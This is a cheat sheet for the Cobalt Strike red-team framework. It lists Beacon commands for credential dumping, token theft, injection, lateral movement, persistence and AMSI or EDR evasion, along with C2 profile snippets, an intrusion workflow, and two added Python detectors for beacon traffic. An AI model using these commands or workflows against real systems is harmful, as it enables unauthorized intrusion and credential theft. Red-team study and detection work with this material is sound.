# Cobalt Strike Cheat Sheet
## Overview
Cobalt Strike is a commercial penetration testing and red team operations platform built to emulate advanced threat actors. It provides a post-exploitation framework that lets operators deploy Beacons (agents) on compromised systems, establish command and control (C2) channels, and carry out a range of offensive security operations.
**Warning:** Cobalt Strike is a commercial security testing tool that should only be used in environments where you have explicit permission to do so.
## Core Components
### Team Server
- Central command and control server
- Runs on Linux
- Manages beacons and listeners
- Provides collaboration for team operations
### Client
- Java-based GUI application
- Connects to the Team Server
- Interface for operators to interact with beacons
- Visualizes target networks
### Beacon
- Primary post-exploitation payload
- Communicates with the Team Server
- Provides various capabilities for offensive operations
- Can operate in different communication modes
## Setup and Configuration
### Team Server Setup
```bash
# Start the Team Server
./teamserver <ip_address> <password> [malleable_c2_profile]
# Example
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile
```
### Client Setup
- Launch the Cobalt Strike client
- Connect > New Connection
- Enter Team Server details:
  - Host:
  - Port: 50050 (default)
  - User:
  - Password:
- Verify the SSL certificate fingerprint
## Listeners
### Creating a Listener
- Cobalt Strike > Listeners
- Click "Add"
- Configure listener settings:
  - Name:
  - Payload:
  - Host:
  - Port:
  - Profile:
- Click "Save"
### Listener Types
| Type | Description |
| --- | --- |
| HTTP | Uses HTTP for C2 communication |
| HTTPS | Uses HTTPS for C2 communication |
| DNS | Uses DNS queries for stealthy C2 |
| SMB | Uses named pipes for peer-to-peer C2 |
| TCP | Uses direct TCP connections |
| Foreign | Integrates with other C2 frameworks |
## Payload Generation
### Beacon Payload Types
Attacks > Packages >
| Payload Type | Description |
| --- | --- |
| Windows Executable | Standard .exe file |
| Windows Service EXE | Service executable |
| DLL | Dynamic Link Library |
| PowerShell | PowerShell one-liner |
| Python | Python script |
| Office Macro | Macro for Office documents |
| Shellcode | Raw shellcode |
### Artifact Kit
Attacks > Packages > Windows Executable (S)
- Generates custom payloads with evasion techniques
- Modifies signatures to avoid detection
- Customizable templates
## Beacon Commands
### Session Management
| Command | Description |
| --- | --- |
| `help` | Display help information |
| `sleep [seconds] [jitter%]` | Set sleep time and jitter |
| `checkin` | Force immediate check-in |
| `exit` | Terminate the beacon session |
| `clear` | Clear the beacon's task queue |
| `jobs` | List running jobs |
| `jobkill [JID]` | Kill a running job |
| `mode dns` | Switch to DNS mode |
| `mode dns-txt` | Switch to DNS-TXT mode |
| `mode dns6` | Switch to DNS6 mode |
| `mode http` | Switch to HTTP mode |
| `mode smb` | Switch to SMB mode |
### Information Gathering
| Command | Description |
| --- | --- |
| `hostname` | Get the hostname |
| `ipconfig` | Display network configuration |
| `netstat` | Display network connections |
| `ps` | List running processes |
| `tasklist` | Alternative to ps |
| `getuid` | Get current user ID |
| `whoami` | Get detailed user information |
| `pwd` | Print working directory |
| `drives` | List available drives |
| `dir [directory]` | List files in directory |
| `ls [directory]` | Alternative to dir |
| `net [command]` | Execute net command |
| `reg query [path]` | Query registry |
| `sysinfo` | Get system information |
### File Operations
| Command | Description |
| --- | --- |
| `cd [directory]` | Change directory |
| `cp [source] [destination]` | Copy a file |
| `mkdir [directory]` | Create a directory |
| `mv [source] [destination]` | Move or rename a file |
| `rm [file]` | Delete a file |
| `rmdir [directory]` | Delete a directory |
| `cat [file]` | Display file contents |
| `download [file]` | Download a file from the target |
| `upload [file]` | Upload a file to the target |
| `timestomp [file] [template]` | Modify file timestamps |
| `ls-acl [file]` | List file permissions |
### Process Operations
| Command | Description |
| --- | --- |
| `execute [program]` | Execute without capturing output |
| `shell [command]` | Execute and capture output |
| `run [program]` | Execute a program |
| `runas [user] [password] [program]` | Execute as another user |
| `pth [user] [domain] [hash]` | Pass-the-hash to create a token |
| `steal_token [pid]` | Steal token from process |
| `make_token [domain] [user] [password]` | Create a token |
| `rev2self` | Revert to original token |
| `getprivs` | Enable system privileges |
| `getsystem` | Attempt to get SYSTEM privileges |
| `execute-assembly [file.exe]` | Execute .NET assembly in memory |
| `powerpick [command]` | Execute PowerShell without powershell.exe |
| `powershell [command]` | Execute PowerShell command |
| `psinject [pid] [command]` | Execute PowerShell in a specific process |
| `shinject [pid] [arch] [file.bin]` | Inject shellcode into process |
| `dllinject [pid] [file.dll]` | Inject DLL into process |
| `dllload [file.dll]` | Load DLL in beacon process |
### Lateral Movement
| Command | Description |
| --- | --- |
| `psexec [target] [listener]` | Use PsExec to deploy beacon |
| `psexec_psh [target] [listener]` | Use PsExec with PowerShell |
| `winrm [target] [listener]` | Use WinRM to deploy beacon |
| `wmi [target] [listener]` | Use WMI to deploy beacon |
| `ssh [target:port] [user] [pass] [listener]` | Use SSH to deploy beacon |
| `ssh-key [target:port] [user] [key] [listener]` | Use SSH with key authentication |
| `dcsync [domain] [user]` | Use DCSync to extract password hashes |
| `jump [method] [target] [listener]` | Jump to target using specified method |
| `remote-exec [method] [target] [command]` | Execute command on remote system |
### Pivoting
| Command | Description |
| --- | --- |
| `rportfwd [bind port] [forward host] [forward port]` | Set up reverse port forward |
| `rportfwd stop [bind port]` | Stop reverse port forward |
| `socks [port]` | Start SOCKS proxy server |
| `socks stop` | Stop SOCKS proxy server |
| `spunnel [host] [port]` | Create encrypted tunnel over SMB |
| `spunnel stop` | Stop encrypted tunnel |
| `covertvpn [interface] [IP/Mask]` | Deploy Covert VPN interface |
| `covertvpn stop` | Stop Covert VPN |
| `pivot [host] [port]` | List pivot listeners |
| `pivotlistener [host] [port]` | Create pivot listener |
### Post-Exploitation
| Command | Description |
| --- | --- |
| `mimikatz [command]` | Execute Mimikatz command |
| `hashdump` | Dump password hashes |
| `logonpasswords` | Dump credentials from memory |
| `keylogger [pid]` | Start keylogger |
| `screenshot [pid]` | Take screenshot |
| `screenwatch [pid]` | Watch target's screen |
| `printscreen` | Take screenshot using PrintScreen |
| `reg query [path]` | Query registry |
| `powerview [command]` | Execute PowerView command |
| `portscan [targets] [ports] [discovery method]` | Scan for open ports |
| `browserpivot [pid] [port]` | Hijack authenticated web sessions |
| `chromedump` | Dump Chrome cookies and login data |
| `persist [method] [listener]` | Set up persistence |
| `elevate [exploit] [listener]` | Attempt privilege escalation |
## Malleable C2 Profiles
### Basic Structure
```
# Global options
set sleeptime "5000";
set jitter "10";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
```
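The sleeptime and jitter settings above fix Beacon's check-in cadence, which is what network defenders look for. As an added example (not Cobalt Strike code and not from the original sheet), the following Python flags hosts in a constructed proxy-log sample whose request gaps cluster as tightly as a 5 s sleep with 10 % jitter produces; the host addresses, timestamps and thresholds are assumptions.

```python
"""Beacon-cadence detector for the sleeptime/jitter settings above.

Added example, not Cobalt Strike code: sleeptime 5000 with jitter 10 yields
check-ins roughly 4.5 to 5 s apart, so per-host request gaps that cluster
that tightly around one value are worth flagging.
"""
from statistics import median
from typing import Dict, List, Tuple

# Constructed sample (source host, epoch seconds), as parsed from a proxy log.
# 10.0.0.5 checks in about every 5 s with ~10 % jitter; 10.0.0.9 browses.
SAMPLE_EVENTS: List[Tuple[str, float]] = [
    ("10.0.0.5", 1000.0), ("10.0.0.5", 1004.7), ("10.0.0.5", 1009.5),
    ("10.0.0.5", 1014.1), ("10.0.0.5", 1018.9), ("10.0.0.5", 1023.6),
    ("10.0.0.9", 1000.0), ("10.0.0.9", 1001.2), ("10.0.0.9", 1030.0),
    ("10.0.0.9", 1031.5), ("10.0.0.9", 1095.0), ("10.0.0.9", 1096.1),
]

def gaps_by_host(events: List[Tuple[str, float]]) -> Dict[str, List[float]]:
    """Group timestamps per host and return each host's inter-request gaps."""
    per_host: Dict[str, List[float]] = {}
    for host, ts in events:
        per_host.setdefault(host, []).append(ts)
    result = {}
    for host, times in per_host.items():
        times.sort()
        result[host] = [b - a for a, b in zip(times, times[1:])]
    return result

def is_beacon_like(gaps: List[float], min_gaps: int = 4,
                   max_spread: float = 0.25) -> bool:
    """True when there are enough gaps and every gap sits within max_spread
    (fraction) of the median. Jitter varies the sleep by up to jitter %, so a
    10 % setting keeps gaps tightly grouped; 0.25 leaves room for network noise."""
    if len(gaps) < min_gaps:
        return False
    m = median(gaps)
    return m > 0 and all(abs(g - m) / m <= max_spread for g in gaps)

def find_beaconing_hosts(events: List[Tuple[str, float]]) -> List[str]:
    """Hosts whose request timing matches a fixed sleep-with-jitter loop."""
    return sorted(host for host, gaps in gaps_by_host(events).items()
                  if is_beacon_like(gaps))

if __name__ == "__main__":
    for host in find_beaconing_hosts(SAMPLE_EVENTS):
        print(f"beacon-like check-in cadence from {host}")
```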
```
# HTTP staging
http-stager {
    set uri "/jquery-3.3.1.min.js";
    client {
        header "Accept" "text/javascript, application/javascript, */*";
    }
    server {
        header "Content-Type" "application/javascript";
    }
}
```
```
# HTTP client
http-get {
    set uri "/api/v1/data";
    client {
        header "Accept" "application/json";
        metadata {
            base64;
            prepend "session=";
            append ";";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/json";
        output {
            json { "status" "success"; "data" ""; }
            prepend "{\"data\":\"";
            append "\"}";
            base64;
        }
    }
}
```
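Every transform in the http-get block above is also a detection opportunity: the metadata travels as base64 behind a fixed "session=" prefix in the Cookie header of a GET to a fixed URI. As an added example (not Cobalt Strike code and not from the original sheet), this Python matches those traits against constructed proxy-log lines; the log format, client addresses and the 16-byte minimum blob size are assumptions.

```python
"""Detect the http-get transaction defined in the profile above (added
example, not Cobalt Strike code). The profile sends beacon metadata as
base64 in a Cookie shaped "session=<base64>;" on GET /api/v1/data with
Accept: application/json; a request showing all three traits is flagged."""
import base64
import binascii
import re
from typing import List, Optional
# Constructed tab-separated proxy log: timestamp, client, method, URI,
# Cookie header ("-" when absent), Accept header.
SAMPLE_LOG = """\
1700000000\t10.0.0.5\tGET\t/api/v1/data\tsession=AAECAwQFBgcICQoLDA0ODw==;\tapplication/json
1700000005\t10.0.0.5\tGET\t/api/v1/data\tsession=EBESExQVFhcYGRobHB0eHw==;\tapplication/json
1700000003\t10.0.0.9\tGET\t/api/v1/data\tsession=abc123;\tapplication/json
1700000004\t10.0.0.7\tGET\t/static/app.js\t-\ttext/javascript
1700000006\t10.0.0.9\tGET\t/api/v1/data\tcsrf=EBESExQVFhcYGRobHB0eHw==;\tapplication/json
"""

PROFILE_URI = "/api/v1/data"
# prepend "session=" / base64 body / append ";" from the metadata block
COOKIE_RE = re.compile(r"^session=([A-Za-z0-9+/]+={0,2});$")

def cookie_payload(cookie: str) -> Optional[bytes]:
    """Decoded metadata blob if the Cookie matches the profile transform, else
    None. Real beacon metadata is not tiny, so short blobs are rejected to
    avoid flagging ordinary session identifiers."""
    m = COOKIE_RE.match(cookie)
    if not m:
        return None
    try:
        blob = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return blob if len(blob) >= 16 else None

def matches_profile(line: str) -> bool:
    """Match one log line against the profile's http-get client block."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 6:
        return False
    _ts, _src, method, uri, cookie, accept = fields
    return (method == "GET" and uri == PROFILE_URI
            and accept == "application/json"
            and cookie_payload(cookie) is not None)

def flag_requests(log: str) -> List[str]:
    """Client IPs of every request that matches the profile."""
    return [ln.split("\t")[1] for ln in log.splitlines() if matches_profile(ln)]
```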
### Testing Profiles
```bash
# Verify profile syntax
./c2lint c2-profiles/normal/amazon.profile
# Start Team Server with profile
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile
```
## Aggressor Scripts
### Basic Script Structure
```
# Event handlers
on beacon_initial {
    println("New beacon: " . $1);
}

# Aliases (custom commands)
alias hello {
    blog($1, "Hello, World!");
}

# Menus
popup beacon_bottom {
    item "Custom Command" {
        blog($1, "Executing custom command...");
        bshell($1, "whoami");
    }
}

# Functions
sub get_system_info {
    bshell($1, "systeminfo");
}
```
### Common Script Functions
| Function | Description |
| --- | --- |
| `blog($1, "message")` | Write to beacon console |
| `bshell($1, "command")` | Execute shell command |
| `bpowershell($1, "command")` | Execute PowerShell command |
| `bpowerpick($1, "command")` | Execute PowerShell without powershell.exe |
| `bexecute_assembly($1, "/path/to/file.exe")` | Execute .NET assembly |
| `bdllspawn($1, "/path/to/file.dll")` | Inject Reflective DLL |
| `bpsexec($1, "target", "listener")` | Execute PsExec lateral movement |
| `bwmi($1, "target", "listener")` | Execute WMI lateral movement |
| `bwinrm($1, "target", "listener")` | Execute WinRM lateral movement |
## OPSEC Considerations
### Process Injection
```
# Set parent process for new processes
ppid [pid]

# Set process to spawn for post-ex jobs
spawnto x64 %windir%\sysnative\rundll32.exe
spawnto x86 %windir%\syswow64\rundll32.exe

# Mask command-line arguments
argue [command] [fake arguments]

# Block non-Microsoft DLLs
blockdlls start
blockdlls stop
```
### Evasion Techniques
```
# Obfuscate beacon in memory
sleep_mask [seconds] [jitter%]

# Configure staging process
stage {
    set obfuscate "true";
    set stomppe "true";
    set cleanup "true";
}

# Disable AMSI
amsi_disable

# Use smarter process injection
smartinject
```
## Common Workflows
### Initial Access
- Create a listener (Cobalt Strike > Listeners)
- Generate a payload (Attacks > Packages)
- Deliver the payload to the target
- Wait for the beacon check-in
### Privilege Escalation
- Check current privileges: `getuid`
- Attempt to get SYSTEM: `getsystem`
- If unsuccessful, try specific exploits: `elevate [exploit] [listener]`
- Verify new privileges: `getuid`
### Credential Harvesting
- Dump hashes: `hashdump`
- Dump credentials from memory: `logonpasswords`
- Use Mimikatz for advanced options: `mimikatz [command]`
- Extract domain hashes (if DC): `dcsync [domain] [user]`
### Lateral Movement
- Identify targets: `net view`
- Choose a lateral movement technique:
  - `psexec [target] [listener]`
  - `winrm [target] [listener]`
  - `wmi [target] [listener]`
- Verify the new beacon check-in
### Persistence
- Choose a persistence method:
  - `persist [method] [listener]`
  - `schtasks [options]`
  - `service [options]`
  - `registry [options]`
- Verify that persistence works
- Document persistence mechanisms for cleanup
## Resources
- Official Cobalt Strike documentation
- Cobalt Strike User Guide: Malleable C2 Profiles
- Aggressor Script documentation
- Cobalt Strike MITRE ATT&CK Mapping